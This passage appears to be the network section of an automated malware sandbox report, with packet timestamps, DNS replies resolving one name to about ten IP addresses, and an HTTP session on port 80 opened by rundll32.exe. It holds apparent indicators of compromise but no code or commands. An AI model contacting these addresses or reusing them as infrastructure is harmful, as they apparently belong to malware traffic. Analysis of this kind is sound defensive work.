Jan 24, 2022 11:10:30.441468954 CET | 80 | 49760 | 91.203.174.38 | 192.168.2.6 |
Jan 24, 2022 11:10:30.441567898 CET | 49760 | 80 | 192.168.2.6 | 91.203.174.38 |
Jan 24, 2022 11:10:30.441710949 CET | 80 | 49760 | 91.203.174.38 | 192.168.2.6 |
Jan 24, 2022 11:10:30.441751003 CET | 80 | 49760 | 91.203.174.38 | 192.168.2.6 |
Jan 24, 2022 11:10:30.441788912 CET | 80 | 49760 | 91.203.174.38 | 192.168.2.6 |
Jan 24, 2022 11:10:30.441896915 CET | 49760 | 80 | 192.168.2.6 | 91.203.174.38 |
Jan 24, 2022 11:10:30.441955090 CET | 80 | 49760 | 91.203.174.38 | 192.168.2.6 |
Jan 24, 2022 11:10:30.441994905 CET | 80 | 49760 | 91.203.174.38 | 192.168.2.6 |
Jan 24, 2022 11:10:30.442122936 CET | 49760 | 80 | 192.168.2.6 | 91.203.174.38 |
Jan 24, 2022 11:10:30.442167044 CET | 80 | 49760 | 91.203.174.38 | 192.168.2.6 |
Jan 24, 2022 11:10:30.442209005 CET | 80 | 49760 | 91.203.174.38 | 192.168.2.6 |
Jan 24, 2022 11:10:30.442234993 CET | 49760 | 80 | 192.168.2.6 | 91.203.174.38 |
Jan 24, 2022 11:10:30.442590952 CET | 80 | 49760 | 91.203.174.38 | 192.168.2.6 |
Jan 24, 2022 11:10:30.442641020 CET | 80 | 49760 | 91.203.174.38 | 192.168.2.6 |
Jan 24, 2022 11:10:30.442658901 CET | 80 | 49760 | 91.203.174.38 | 192.168.2.6 |
Jan 24, 2022 11:10:30.442663908 CET | 49760 | 80 | 192.168.2.6 | 91.203.174.38 |
Jan 24, 2022 11:10:30.442718029 CET | 49760 | 80 | 192.168.2.6 | 91.203.174.38 |
Jan 24, 2022 11:10:30.442838907 CET | 80 | 49760 | 91.203.174.38 | 192.168.2.6 |
Jan 24, 2022 11:10:30.442877054 CET | 80 | 49760 | 91.203.174.38 | 192.168.2.6 |
Jan 24, 2022 11:10:30.442975998 CET | 49760 | 80 | 192.168.2.6 | 91.203.174.38 |
Jan 24, 2022 11:10:30.443073034 CET | 80 | 49760 | 91.203.174.38 | 192.168.2.6 |
Jan 24, 2022 11:10:30.481662035 CET | 80 | 49760 | 91.203.174.38 | 192.168.2.6 |
Jan 24, 2022 11:10:30.481699944 CET | 80 | 49760 | 91.203.174.38 | 192.168.2.6 |
Jan 24, 2022 11:10:30.481914043 CET | 49760 | 80 | 192.168.2.6 | 91.203.174.38 |
Jan 24, 2022 11:10:30.623564005 CET | 80 | 49760 | 91.203.174.38 | 192.168.2.6 |
Jan 24, 2022 11:10:30.623603106 CET | 80 | 49760 | 91.203.174.38 | 192.168.2.6 |
Jan 24, 2022 11:10:30.623629093 CET | 80 | 49760 | 91.203.174.38 | 192.168.2.6 |
Jan 24, 2022 11:10:30.623719931 CET | 80 | 49760 | 91.203.174.38 | 192.168.2.6 |
Jan 24, 2022 11:10:30.623766899 CET | 49760 | 80 | 192.168.2.6 | 91.203.174.38 |
Jan 24, 2022 11:10:30.623858929 CET | 49760 | 80 | 192.168.2.6 | 91.203.174.38 |
Jan 24, 2022 11:10:30.623995066 CET | 80 | 49760 | 91.203.174.38 | 192.168.2.6 |
Jan 24, 2022 11:10:30.624021053 CET | 80 | 49760 | 91.203.174.38 | 192.168.2.6 |
Jan 24, 2022 11:10:30.624109030 CET | 49760 | 80 | 192.168.2.6 | 91.203.174.38 |
Jan 24, 2022 11:10:30.624300003 CET | 80 | 49760 | 91.203.174.38 | 192.168.2.6 |
Jan 24, 2022 11:10:30.624697924 CET | 80 | 49760 | 91.203.174.38 | 192.168.2.6 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Jan 24, 2022 11:10:28.414808035 CET | 51774 | 53 | 192.168.2.6 | 8.8.8.8 |
Jan 24, 2022 11:10:28.483218908 CET | 53 | 51774 | 8.8.8.8 | 192.168.2.6 |
Jan 24, 2022 11:10:31.052858114 CET | 56023 | 53 | 192.168.2.6 | 8.8.8.8 |
Jan 24, 2022 11:10:31.122343063 CET | 53 | 56023 | 8.8.8.8 | 192.168.2.6 |
Jan 24, 2022 11:10:33.445388079 CET | 58384 | 53 | 192.168.2.6 | 8.8.8.8 |
Jan 24, 2022 11:10:33.609316111 CET | 53 | 58384 | 8.8.8.8 | 192.168.2.6 |
Jan 24, 2022 11:10:34.169456959 CET | 60261 | 53 | 192.168.2.6 | 8.8.8.8 |
Jan 24, 2022 11:10:34.354336977 CET | 53 | 60261 | 8.8.8.8 | 192.168.2.6 |
Jan 24, 2022 11:10:40.163948059 CET | 56061 | 53 | 192.168.2.6 | 8.8.8.8 |
Jan 24, 2022 11:10:40.183387041 CET | 53 | 56061 | 8.8.8.8 | 192.168.2.6 |
Jan 24, 2022 11:10:42.621546030 CET | 58336 | 53 | 192.168.2.6 | 8.8.8.8 |
Jan 24, 2022 11:10:42.691263914 CET | 53 | 58336 | 8.8.8.8 | 192.168.2.6 |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
---|---|---|---|---|---|---|---|
Jan 24, 2022 11:10:28.414808035 CET | 192.168.2.6 | 8.8.8.8 | 0xe190 | Standard query (0) | A (IP address) | IN (0x0001) | |
Jan 24, 2022 11:10:31.052858114 CET | 192.168.2.6 | 8.8.8.8 | 0x930a | Standard query (0) | A (IP address) | IN (0x0001) | |
Jan 24, 2022 11:10:33.445388079 CET | 192.168.2.6 | 8.8.8.8 | 0x78b9 | Standard query (0) | A (IP address) | IN (0x0001) | |
Jan 24, 2022 11:10:34.169456959 CET | 192.168.2.6 | 8.8.8.8 | 0x8b6 | Standard query (0) | A (IP address) | IN (0x0001) | |
Jan 24, 2022 11:10:40.163948059 CET | 192.168.2.6 | 8.8.8.8 | 0xea12 | Standard query (0) | A (IP address) | IN (0x0001) | |
Jan 24, 2022 11:10:42.621546030 CET | 192.168.2.6 | 8.8.8.8 | 0x8a50 | Standard query (0) | A (IP address) | IN (0x0001) |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
---|---|---|---|---|---|---|---|---|---|
Jan 24, 2022 11:10:28.483218908 CET | 8.8.8.8 | 192.168.2.6 | 0xe190 | No error (0) | 91.203.174.38 | A (IP address) | IN (0x0001) | ||
Jan 24, 2022 11:10:28.483218908 CET | 8.8.8.8 | 192.168.2.6 | 0xe190 | No error (0) | 211.169.6.249 | A (IP address) | IN (0x0001) | ||
Jan 24, 2022 11:10:28.483218908 CET | 8.8.8.8 | 192.168.2.6 | 0xe190 | No error (0) | 61.98.7.132 | A (IP address) | IN (0x0001) | ||
Jan 24, 2022 11:10:28.483218908 CET | 8.8.8.8 | 192.168.2.6 | 0xe190 | No error (0) | 186.182.55.44 | A (IP address) | IN (0x0001) | ||
Jan 24, 2022 11:10:28.483218908 CET | 8.8.8.8 | 192.168.2.6 | 0xe190 | No error (0) | 211.40.39.251 | A (IP address) | IN (0x0001) | ||
Jan 24, 2022 11:10:28.483218908 CET | 8.8.8.8 | 192.168.2.6 | 0xe190 | No error (0) | 121.136.102.4 | A (IP address) | IN (0x0001) | ||
Jan 24, 2022 11:10:28.483218908 CET | 8.8.8.8 | 192.168.2.6 | 0xe190 | No error (0) | 222.236.49.123 | A (IP address) | IN (0x0001) | ||
Jan 24, 2022 11:10:28.483218908 CET | 8.8.8.8 | 192.168.2.6 | 0xe190 | No error (0) | 151.251.30.69 | A (IP address) | IN (0x0001) | ||
Jan 24, 2022 11:10:28.483218908 CET | 8.8.8.8 | 192.168.2.6 | 0xe190 | No error (0) | 37.34.176.37 | A (IP address) | IN (0x0001) | ||
Jan 24, 2022 11:10:28.483218908 CET | 8.8.8.8 | 192.168.2.6 | 0xe190 | No error (0) | 138.36.3.134 | A (IP address) | IN (0x0001) | ||
Jan 24, 2022 11:10:31.122343063 CET | 8.8.8.8 | 192.168.2.6 | 0x930a | No error (0) | 138.36.3.134 | A (IP address) | IN (0x0001) | ||
Jan 24, 2022 11:10:31.122343063 CET | 8.8.8.8 | 192.168.2.6 | 0x930a | No error (0) | 91.203.174.38 | A (IP address) | IN (0x0001) | ||
Jan 24, 2022 11:10:31.122343063 CET | 8.8.8.8 | 192.168.2.6 | 0x930a | No error (0) | 211.169.6.249 | A (IP address) | IN (0x0001) | ||
Jan 24, 2022 11:10:31.122343063 CET | 8.8.8.8 | 192.168.2.6 | 0x930a | No error (0) | 61.98.7.132 | A (IP address) | IN (0x0001) | ||
Jan 24, 2022 11:10:31.122343063 CET | 8.8.8.8 | 192.168.2.6 | 0x930a | No error (0) | 186.182.55.44 | A (IP address) | IN (0x0001) | ||
Jan 24, 2022 11:10:31.122343063 CET | 8.8.8.8 | 192.168.2.6 | 0x930a | No error (0) | 211.40.39.251 | A (IP address) | IN (0x0001) | ||
Jan 24, 2022 11:10:31.122343063 CET | 8.8.8.8 | 192.168.2.6 | 0x930a | No error (0) | 121.136.102.4 | A (IP address) | IN (0x0001) | ||
Jan 24, 2022 11:10:31.122343063 CET | 8.8.8.8 | 192.168.2.6 | 0x930a | No error (0) | 222.236.49.123 | A (IP address) | IN (0x0001) | ||
Jan 24, 2022 11:10:31.122343063 CET | 8.8.8.8 | 192.168.2.6 | 0x930a | No error (0) | 151.251.30.69 | A (IP address) | IN (0x0001) | ||
Jan 24, 2022 11:10:31.122343063 CET | 8.8.8.8 | 192.168.2.6 | 0x930a | No error (0) | 37.34.176.37 | A (IP address) | IN (0x0001) | ||
Jan 24, 2022 11:10:33.609316111 CET | 8.8.8.8 | 192.168.2.6 | 0x78b9 | No error (0) | 211.40.39.251 | A (IP address) | IN (0x0001) | ||
Jan 24, 2022 11:10:33.609316111 CET | 8.8.8.8 | 192.168.2.6 | 0x78b9 | No error (0) | 121.136.102.4 | A (IP address) | IN (0x0001) | ||
Jan 24, 2022 11:10:33.609316111 CET | 8.8.8.8 | 192.168.2.6 | 0x78b9 | No error (0) | 222.236.49.123 | A (IP address) | IN (0x0001) | ||
Jan 24, 2022 11:10:33.609316111 CET | 8.8.8.8 | 192.168.2.6 | 0x78b9 | No error (0) | 151.251.30.69 | A (IP address) | IN (0x0001) | ||
Jan 24, 2022 11:10:33.609316111 CET | 8.8.8.8 | 192.168.2.6 | 0x78b9 | No error (0) | 37.34.176.37 | A (IP address) | IN (0x0001) | ||
Jan 24, 2022 11:10:33.609316111 CET | 8.8.8.8 | 192.168.2.6 | 0x78b9 | No error (0) | 138.36.3.134 | A (IP address) | IN (0x0001) | ||
Jan 24, 2022 11:10:33.609316111 CET | 8.8.8.8 | 192.168.2.6 | 0x78b9 | No error (0) | 91.203.174.38 | A (IP address) | IN (0x0001) | ||
Jan 24, 2022 11:10:33.609316111 CET | 8.8.8.8 | 192.168.2.6 | 0x78b9 | No error (0) | 211.169.6.249 | A (IP address) | IN (0x0001) | ||
Jan 24, 2022 11:10:33.609316111 CET | 8.8.8.8 | 192.168.2.6 | 0x78b9 | No error (0) | 61.98.7.132 | A (IP address) | IN (0x0001) | ||
Jan 24, 2022 11:10:33.609316111 CET | 8.8.8.8 | 192.168.2.6 | 0x78b9 | No error (0) | 186.182.55.44 | A (IP address) | IN (0x0001) | ||
Jan 24, 2022 11:10:34.354336977 CET | 8.8.8.8 | 192.168.2.6 | 0x8b6 | No error (0) | 61.98.7.132 | A (IP address) | IN (0x0001) | ||
Jan 24, 2022 11:10:34.354336977 CET | 8.8.8.8 | 192.168.2.6 | 0x8b6 | No error (0) | 186.182.55.44 | A (IP address) | IN (0x0001) | ||
Jan 24, 2022 11:10:34.354336977 CET | 8.8.8.8 | 192.168.2.6 | 0x8b6 | No error (0) | 211.40.39.251 | A (IP address) | IN (0x0001) | ||
Jan 24, 2022 11:10:34.354336977 CET | 8.8.8.8 | 192.168.2.6 | 0x8b6 | No error (0) | 121.136.102.4 | A (IP address) | IN (0x0001) | ||
Jan 24, 2022 11:10:34.354336977 CET | 8.8.8.8 | 192.168.2.6 | 0x8b6 | No error (0) | 222.236.49.123 | A (IP address) | IN (0x0001) | ||
Jan 24, 2022 11:10:34.354336977 CET | 8.8.8.8 | 192.168.2.6 | 0x8b6 | No error (0) | 151.251.30.69 | A (IP address) | IN (0x0001) | ||
Jan 24, 2022 11:10:34.354336977 CET | 8.8.8.8 | 192.168.2.6 | 0x8b6 | No error (0) | 37.34.176.37 | A (IP address) | IN (0x0001) | ||
Jan 24, 2022 11:10:34.354336977 CET | 8.8.8.8 | 192.168.2.6 | 0x8b6 | No error (0) | 138.36.3.134 | A (IP address) | IN (0x0001) | ||
Jan 24, 2022 11:10:34.354336977 CET | 8.8.8.8 | 192.168.2.6 | 0x8b6 | No error (0) | 91.203.174.38 | A (IP address) | IN (0x0001) | ||
Jan 24, 2022 11:10:34.354336977 CET | 8.8.8.8 | 192.168.2.6 | 0x8b6 | No error (0) | 211.169.6.249 | A (IP address) | IN (0x0001) | ||
Jan 24, 2022 11:10:40.183387041 CET | 8.8.8.8 | 192.168.2.6 | 0xea12 | No error (0) | 91.203.174.38 | A (IP address) | IN (0x0001) | ||
Jan 24, 2022 11:10:40.183387041 CET | 8.8.8.8 | 192.168.2.6 | 0xea12 | No error (0) | 211.169.6.249 | A (IP address) | IN (0x0001) | ||
Jan 24, 2022 11:10:40.183387041 CET | 8.8.8.8 | 192.168.2.6 | 0xea12 | No error (0) | 61.98.7.132 | A (IP address) | IN (0x0001) | ||
Jan 24, 2022 11:10:40.183387041 CET | 8.8.8.8 | 192.168.2.6 | 0xea12 | No error (0) | 186.182.55.44 | A (IP address) | IN (0x0001) | ||
Jan 24, 2022 11:10:40.183387041 CET | 8.8.8.8 | 192.168.2.6 | 0xea12 | No error (0) | 211.40.39.251 | A (IP address) | IN (0x0001) | ||
Jan 24, 2022 11:10:40.183387041 CET | 8.8.8.8 | 192.168.2.6 | 0xea12 | No error (0) | 121.136.102.4 | A (IP address) | IN (0x0001) | ||
Jan 24, 2022 11:10:40.183387041 CET | 8.8.8.8 | 192.168.2.6 | 0xea12 | No error (0) | 222.236.49.123 | A (IP address) | IN (0x0001) | ||
Jan 24, 2022 11:10:40.183387041 CET | 8.8.8.8 | 192.168.2.6 | 0xea12 | No error (0) | 151.251.30.69 | A (IP address) | IN (0x0001) | ||
Jan 24, 2022 11:10:40.183387041 CET | 8.8.8.8 | 192.168.2.6 | 0xea12 | No error (0) | 37.34.176.37 | A (IP address) | IN (0x0001) | ||
Jan 24, 2022 11:10:40.183387041 CET | 8.8.8.8 | 192.168.2.6 | 0xea12 | No error (0) | 138.36.3.134 | A (IP address) | IN (0x0001) | ||
Jan 24, 2022 11:10:42.691263914 CET | 8.8.8.8 | 192.168.2.6 | 0x8a50 | No error (0) | 121.136.102.4 | A (IP address) | IN (0x0001) | ||
Jan 24, 2022 11:10:42.691263914 CET | 8.8.8.8 | 192.168.2.6 | 0x8a50 | No error (0) | 222.236.49.123 | A (IP address) | IN (0x0001) | ||
Jan 24, 2022 11:10:42.691263914 CET | 8.8.8.8 | 192.168.2.6 | 0x8a50 | No error (0) | 151.251.30.69 | A (IP address) | IN (0x0001) | ||
Jan 24, 2022 11:10:42.691263914 CET | 8.8.8.8 | 192.168.2.6 | 0x8a50 | No error (0) | 37.34.176.37 | A (IP address) | IN (0x0001) | ||
Jan 24, 2022 11:10:42.691263914 CET | 8.8.8.8 | 192.168.2.6 | 0x8a50 | No error (0) | 138.36.3.134 | A (IP address) | IN (0x0001) | ||
Jan 24, 2022 11:10:42.691263914 CET | 8.8.8.8 | 192.168.2.6 | 0x8a50 | No error (0) | 91.203.174.38 | A (IP address) | IN (0x0001) | ||
Jan 24, 2022 11:10:42.691263914 CET | 8.8.8.8 | 192.168.2.6 | 0x8a50 | No error (0) | 211.169.6.249 | A (IP address) | IN (0x0001) | ||
Jan 24, 2022 11:10:42.691263914 CET | 8.8.8.8 | 192.168.2.6 | 0x8a50 | No error (0) | 61.98.7.132 | A (IP address) | IN (0x0001) | ||
Jan 24, 2022 11:10:42.691263914 CET | 8.8.8.8 | 192.168.2.6 | 0x8a50 | No error (0) | 186.182.55.44 | A (IP address) | IN (0x0001) | ||
Jan 24, 2022 11:10:42.691263914 CET | 8.8.8.8 | 192.168.2.6 | 0x8a50 | No error (0) | 211.40.39.251 | A (IP address) | IN (0x0001) |
|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
0 | 192.168.2.6 | 49760 | 91.203.174.38 | 80 | C:\Windows\SysWOW64\rundll32.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 24, 2022 11:10:28.654587030 CET | 1047 | OUT | |
Jan 24, 2022 11:10:29.617388964 CET | 1048 | IN |